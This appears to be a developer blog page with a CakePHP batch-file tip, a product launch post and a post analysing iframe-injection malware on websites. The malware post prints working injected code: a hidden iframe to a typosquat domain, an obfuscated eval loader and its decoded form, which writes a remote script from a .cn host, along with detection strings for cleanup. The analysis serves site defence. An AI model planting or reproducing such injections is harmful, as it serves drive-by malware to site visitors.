Let me share a quickie which will save you a few seconds if you’re using CakePHP under Windows environment. To activate CakePHP shell, you must be doing it ugly way which involves copying up full path of ‘app’ directory or cake’s console directory. To overcome this:

1. Create a new separate directory somewhere on your machine (say 3rdpartytools)
2. Create a batch file here called cake.bat with following contents:

   @echo off

   ..\cake\console\cake %*

3. Now, add this directory to your ‘Path’ variable (environment variable) from control panel.
4. Restart windows and you’re done.

Now to activate CakePHP shell, just open ‘cmd’ from working app directory and type your favorite command like ‘cake schema generate –f’ or anything. What happens behind the scene? Our own cake.bat is called after we issue a command, which then passes execution to console’s cake.bat.

Hope it saves you some time.

On Nov. 23, we launched our free online invoicing application called Invoice Dude and I finally have the time to write about it. Invoice Dude is a free invoicing application to help you bill your clients with ease without spending any money or any kind of leasing-fee. As we’re mostly into custom web development for the clients, we had the idea from almost an year - but it was only few weeks back when our team finally committed to this project.

Invoice Dude is currently under private beta phase (which means accounts are limited) and once we get out of it, we’re going to launch some add-ons. The add-ons list is not yet decided however we invite community once again to take part in it and vote for the most needed add-ons.

We plan to launch such similar projects in near future and look forward to the feedback of community. If you have any suggestions regarding the software, please tell us.

I’ve spent many hours fixing this ongoing latest Iframe injection trend lately, And I’ve noticed one thing, every time our team fixes it up – it comes back in a new enhanced form which is difficult to delete automatically. Like the first time it began with:

<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

After that, code got better and less readable. And now the final version looks like this:

<!–

(function(KWaP){var hSgtJ=’:76a:72:20a:3d:22ScriptEngine:22:2c:62:3d:22:56:65rs:

69on()+:22:2cj:3d:22:22:2cu:3dn:61vigato:72:2eus:65:72:41gent:3bif((u:2einde:78Of(:

22Chrom:65:22):3c0:29:26:26(u:2e:69nd:65:78Of(:22Win:22):3e0):26:26(:75:2eindex:

4ff(:22:4eT:206:22):3c0):26:26(d:6f:63um:65nt:2ecookie:2ei:6edex:4ff(:22miek:3d1:

22):3c0):26:26:28:74y:70e:6f:66(:7arvz:74s:29:21:3dtyp:65:6ff:28:22A:22))):

7bz:72:76zt:73:3d:22A:22:3be:76al(:22if(:77indow:2e:22+:61+:22)j:3dj+:22+:61+:22:

4dajo:72:22+b+:61+:22Mi:6eo:72:22+b:2ba+:22B:75ild:22+:62+:22j:3b:22):

3bdocument:2ewrite(:22:3c:73:63r:69:70:74:20src:3d:2f:2fma:22:2b:22rt:75z:2e:63n:

2f:76i:64:2f:3f:69d:3d:22+j+:22:3e:3c:5c:2f:73cript:3e:22):3b:7d’;

eval(unescape(hSgtJ.replace(KWaP,’%')))})(/\:/g);

–>

Let’s reverse engineer it for fun. See that little evil eval()? Replace it by alert() or any other logger function like console.log() for Firebug. That will give us:

<!–

var a=”ScriptEngine”,b=”Version()+”,j=”",u=navigator.userAgent;if((u.indexOf(”Chrome”)<0)&&(u.indexOf(”Win”)>0)&&(u.indexOf(”NT 6″)<0)&&(document.cookie.indexOf(”miek=1″)<0)&&(typeof(zrvzts)!=typeof(”A”))){zrvzts=”A”;

eval(”if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);document.write(”<script src=//ma”+”rtuz.cn/vid/?id=”+j+”><\/script>”);}

–>

That *.cn domain is back again. To find this new injection, common pattern you need to lookup is as below:

3bdocument:2ewrite(:

Some other patterns you might want to check:

document.write(’<iframe

www.zj5173.com

How to clean your website?

Use ‘grep’ command or any other tool for Windows like PowerGrep. Other possible idea for an advanced user to avoid these attacks is to use a version control tool, and keep your site as a checked out copy. The advantage using this method is that you’ll know all the modified files just by issuing simple “svn status” command.

You can also contact us directly if you need assistance on this. We’ve helped securing over 50+ websites in last 3 months.